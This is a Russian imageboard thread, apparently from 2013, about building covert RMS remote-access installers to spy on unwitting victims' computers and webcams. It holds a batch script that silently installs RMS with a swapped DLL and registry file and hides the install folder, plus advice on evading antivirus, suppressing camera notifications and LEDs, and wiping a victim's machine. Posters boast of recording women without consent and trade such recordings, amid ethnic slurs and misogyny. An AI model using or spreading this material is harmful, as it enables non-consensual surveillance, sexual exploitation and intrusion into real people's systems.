Посоны, поясните кое-что за билдер. Скоро будет доступ к одному компутеру. Хочу вбросить рмс. Когда будет доступ, интернета на компе не будет, запускать буду с флешки. Допустим собрал я рмс. Я правильно понимаю, что в готовом рмс-экзешнике уже вшит отсылатель ид на почту или отсылатель вшит в лоадер?
Компуктер выходит в сеть достаточно редко. Как часто рмс опрашивает сервер?
Посоны, через что ещё можно запилить удалённую камеру кроме встроенной в РМС и Вебкамхака? Заебись будет если она ещё и через НАТ будет работать. Хомяков достаточно, но не могу включить их камеры, так как палится табличка, а переделанный РМС палится антивирусами, как и Вебкамхак. Поделитесь аноны чем смотрите вы.
можно узнать хоть какую-нибудь инфу по пека, не вбрасывая жертве левый файл, по АЙПИ например
@chcp 1251
mkdir "%ProgramFiles%\Remote Manipulator System - Host"
copy winmm.dll "%ProgramFiles%\Remote Manipulator System - Host" >nul
@MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress
@MsiExec /x {54067864-C0E7-47DB-A0C1-D6C874CE6BD8} /qn REBOOT=ReallySuppress
@ping 127.0.0.1
@MsiExec /I "rms.host5.5ru.msi" /qn
@ping 127.0.0.1
regedit /s 28.reg
@attrib +h +s +r "%programfiles%\Remote Manipulator System - Host"
@attrib +h +s +r "%ProgramFiles(x86)%\Remote Manipulator System - Host"
@attrib +h +s +r /d /s "%programfiles%\Remote Manipulator System - Host\."
@attrib +h +s +r /d /s "%ProgramFiles(x86)%\Remote Manipulator System - Host\."
Закрепил сие распространеную сборку. с winm.dll и 28reg файлом. Ключик сгенерировал. ОТправил 2 людям. у обоих антивирусы промолчали. Установка тихо спокойно. В процессах сидит все как положено. ИД приходит. Добавляю. Не в сети пишет и не конектится. 2 раза щелкаю в ту же секунду не хочет конектится. Как будто даже не пытается. И вот 2 ИД и оба не в сети. Хотя один из них друг с которым тестили. В чем проблема? У меня такая догадка что хост при отправке инфы на ИД сервакк определяется что у него эта версия с winm и 28 рег файлом. Другого объяснения найти не могу почему оба компа офлайн и нет конекта. 2 дня мучаюсь толку нет. Люди знающие подскажите или выскажите хотя бы предположения. Сижу за натом, у друга динамический внешний ип.
Вот. Сюда загрузить не получается выкладываю на обменник
http://rghost.ru/50975141
еще кстати пропинговал сервак рмс отклик идет потери пакетов нет, но это я так на всякий случай мало ли.
вот лог мой когда пытаюсь подключится
13:53:04_15-12-2013_045 Connection #154591. Connection to "Андрей-ПК". Mode: <Authorization>. Connecting...
13:53:04_15-12-2013_045 InetConnection #154591. Internet connection to Андрей-ПК (rms-server.tektonit.ru:5656).
13:53:04_15-12-2013_342 Connection #154591. Connection to "Андре-ПК" failed. Mode: <Authorization>.
>>49168
Насчет сырцов это ты точно подметил. Оп, запили сырцы.
Посоны, я правильно понимаю, сейчас можно скрыть уведомление о включении камеры патчингом самих файлов и ддлкой которая будет скрывать баннер? Но при патчинге мы теряем подпись и получаем унижения от антивируса, а как насчёт ддлки? Её не режут? Её можно добавить на уже установленный рмс? Поделитесь ей посоны, и то как её поставить на уже рабочий рмс, хочу попробовать записать какой нибудь вин, давно не было.
>>49189
Вроде разобрался, но пиздец грузит цп у хомки, это ддлка так грузит или просмотр камеры сам по себе?
Блджад посоны, в общем одна хомка течёт по хачам, сидит в чатах и вылавливает их, пидорков волосатых с турции и подобного говна, я просто охуеваю какие шлюхи, слушает какого хачёвское говно круглыми сутками и имеет в друзья тонны хачей, ёбанный пиздец, просто припекло от того что не врут, так и есть, русские бляди.
>>49204
и ты хочешь теперь поплакатся тут и отомстить ей, за то что тебе, прыщавому лоху, она даже за ручку подержать не дала?
>>49205
Долбоёб, это рандомная тупая пизда, мне обсолютно похуй, я просто охуеваю от того как она течёт по хачам, привет хач.
Посоны, тян дрочат инфа 100%, а потом улыбаются и ковыряют этим пальцем в носу, пруф http://rghost.ru/private/51100578/38ee0a804c3cbe246f10ec50273ee465 до этого дрочила на трапов и геев
Алсо, доставьте своего отснятого, вспомним старое радмин треды.
В чем проблема?
>>47661
>.vb
Ну вы точно ебанутые.
>>49229
Сейчас наведал её, у ней открыт вконтач и там какой-то пидарок ей пишет что с ней не какая-то лезбиянка не прочь заняться сексом, снова охуел.
Добавьте чего-нибудь посоны, ёбана, что с вами стало.
>>4806
Дорогие анончики, и как мне блять пользоваться этой ссылкой? Как мне приписать свою почту для отправки ID к этой хуйне? Или если я ее качну себе, автору полетят мои ID и пасс?
>>49233
Вообще можно бы разъяснить по-человечески, как грамотно ебошить этим билдером и как залить его хомячку
>>49234
да я и сам гуманитарий в этих ваших интернетах, а принцип понять хочется.
>>49192
Как разобрался, котан? Расскажи поподробней, у меня тот же случай с уже установленным и работающим хостом у хомяка, ебаный баннер не дает записать годный вин.
>>4914
Ни один долбоеб не поленился выложить годноту в виде мануала или нормально работаюзей сборки, которая надежно скрывает хуеблядский баннер и не пиздит твои собственные пароли встроенными троянами.
>>49238
Ты писать умеешь? Я вот не очень все поправимо, терпение и труд все перетрут. Давай вместе напишем билдер и все будет в порядке.
Посоны, дайте ссылку на эту хитровыебанную dll-ку которая баннер лечит и которую можно вставить в уже установленный хост хомяку. Буду очень признателен.
Охуительно блять набигаем, все как мразота зажались нихуя не говорят и прячут, заебатый раздел.
что блять, в интернетах действительно нет ссылки на сборку rms, не содержащую неприятного авторского сюрприза замаскированого трояна? Как сука скачиваешь, так блять тут антивирь начинает меня бешено унижать.
Котанчики, подскажите, что можно с седьмой виндой удалённо нахреначить? Чтоб больше не запускалась? Месть должна быть болезненной. Сначала хочу винчестеры форматнуть.
>>49257
Да пошёл ты нахуй, пионер. Прячут им, блядь. Как сука голову себе ломать, какого хуя еще вчера работавшая личинка сегодня палится вирустоталом - так хуй кто хочет помочь. Зато каждый третий - охуевшая крыса. Придумывать что-то новое - хуй там, хочу кнопку "взломать всех и подрочить мне". Иди нахуй, пионер. Уёбывай в свой /b/
Как у вас дела? ОП, ты живой? Хочу узнать что с антивирусами? Кто тестировал конкретно аваст и касперский? Насколько я помню, в дефолтном режиме аваст блокирует почти все программы которые пытаются что-то транслировать или вообще передать в сеть. Кому-нибудь еще это интересно?
> Кому-нибудь еще это интересно?
Да
>>49267
Уже вторую неделю не могу вылечить баннер, интересно пиздец. Ни одна версия с 5.0 до 5.5 не лечит блеать!
>>49211
>Алсо, доставьте своего отснятого, вспомним старое радмин треды.
Молю!
мимо-залетный-кун
У кого будет желание вместе со мной поковыряться и написать свой билдер со всем нужными вещами пишите на
[email protected]
Пинусы, а как сделать скрытую камеру или подобный рмс бекдор на андроид устройствах? Что бы в обход нат, включение камеры и прочая хуйня, есть кто осилил?
ахх блять что я нашел. http://www.xaker.name/forvb/archive/index.php/t-23230-p-6.html
тут есть ссылочка на http://www.sendspace.com/file/r4ay6a, авторская сборка. Я не качал, нахуй надо, но мож кто будет тестить, отзовитесь,если вам комп распидорасило, интересно же, хули.
>>49302
я полгода назад эту поеботу скачивал, версия 5.3, и она сильно палится. Лучше бы дал ссылку на 5.5 блять сука
>>49211
Так может она запалила тебя? Анон, будь добр, накидай ещё с ней.
>>49353
Без проблем, я виртуалку снёс, как поставлю постараюсь записать. Она не запалили, она реально ебанутая смеялась когда фапала, в общем фапала часа 2-3, настроение менялось во все строны.
Я ньюфаг, только не гоните ссаными тряпками.
С помощью это штуковины можно получить доступ к чужому компу? Что и как запускать, гайды ест?
>>49435
я тоже ньюфаг, и я тоже ищу мануал,но толкового гайда нет, и это печально. Ищи, если найдешь - отпишись. Гайды - это легенда
PIDORA OTVET
>>47937
Залей на хостинг нульча
http://0chan.hk/u/
>>47630
Но при наблюдении загорается лампа вебкамеры. Как с этим быть?
>>49457
Зависит от камеры. Некоторые поддерживают софтварное отключение индикатора, некоторые нет. Даже не знаю, каких больше.
Но на Питух ОС™ ты всё равно ничего не сможешь сделать, так что:
>Как с этим быть?
Смириться.
>>49459
И какие же кроме некоторых логитеков это отключение поддерживают?
>>49460
У меня ноут от HP. Нашёл библиотеку для отключения. Дисейблю но всё равно горит. Такое чувство, что это какой-то механический способ индикации, а не программный.
>>49462
так ты дибил лампочка загорается, когда подается питание на вебку. На ноутбуках используют дешевые камеры, поэтому на всех так. И хуй ты подрочишь на тяночку с ноутом. Только если этот ноут без LEDа. Да такие есть, но старые. В новых лампочки есть во всех.
>>49464
Сука, и как быть, ждать пока она по скайпу решит с кем-то решит пошликать? Но будет ли тогда доступ к занятой камере?
>>49466
конечно будет, камера же одноканальная. Никак не быть. Если бы знал её, то мог пока она моется в ванной разобрать ноут и отпаять контакт светодиода.
>>49467
Да ты же поехавший паяльником туда лезть - там этого светодиода меньше миллиметра. Шилом сковырнуть его, и дрочи сколько влезет.
>>49468
Ну ты ж блять даже не знаешь, каких больше. А, ты просто не знаешь, яснопонятно. Хули пиздашь тогда?
>>49470
>не знаешь, каких больше
И чего?
>Хули пиздашь тогда?
Я не пизжу, я только правду сказал. А вот ты спиздел.
Сделал сборку. Закинул нескольким, все пашет. Можно ли как-то спрятать ехе-шник (в картинку не пойдет), а крипторов годных нету. Собсно советы оставляйте сдесь
>>49473
Расскажи пожалуйста ньюфагу, как ты вылечил баннер и собрал всю эту ересь?? /i/ ценит таких героев как ты. Ткни мордой, куда и что писать и копировать, ибо нуб нубом.
Возможно ли в вашей сборке поменять сервер Internet ID'a ? Хотел запустить собственный и пусить все через него
Выложил исходники на SourceForge. https://sourceforge.net/projects/rmsbuilder/files/0.1/
Ах да, чуть не забыл: разработка прекращается ввиду того, что меня уже доебал этот RMS. Всем удачи.
ОП
>>49490
> Выложил исходники
> разработка прекращается
As planned, хули.
>>49490
Пиздуй помогай анону из соседнего треда с созданием шиндоус-сборочки.
Двачуйте суки. Если официальная сборка помогла мне долго и с наслаждением распидорасить ебучую машину одного ФГМ-нутого, то что тогда можно делать скрытой??? Ебашьте свои анонимные сборочки во славу /i/
Куда чаще всего личинку заливаете?
ucoz?
>>49643
https://fuckav.ru/showpost.php?p=93639&postcount=4
> Вот убейте, но такое говно 1500 никак стоить не может. Максимум 200
Нахуй он нужен ?
Он же у вас палится всем чем можно только.
Радминов и вебок тред куда-то закопался, хотя по идее всегда должен быть на этой борде в зоне видимости.
бампану вебкой
https://80.11.223.236/
Кто скажет на чем она написана? Этот билдер?
>>48791
алсо помудрил с кодировками, теперь нормально отображает, но половина функций все равно не работает. не подскажите в какую сторону копать? почему strangelove только под радмином нормально работает?
>>49879
Чтобы написать свой, с блекджеком и шлюхами.
Делайте реквесты, начинаем пилить.
Сап /i/. Появилось настроение поговнокодить. Как думаешь, стоит ли запилить билдер для сей программы? Какие дополнительные функции стоит реализовать?
RMS-кун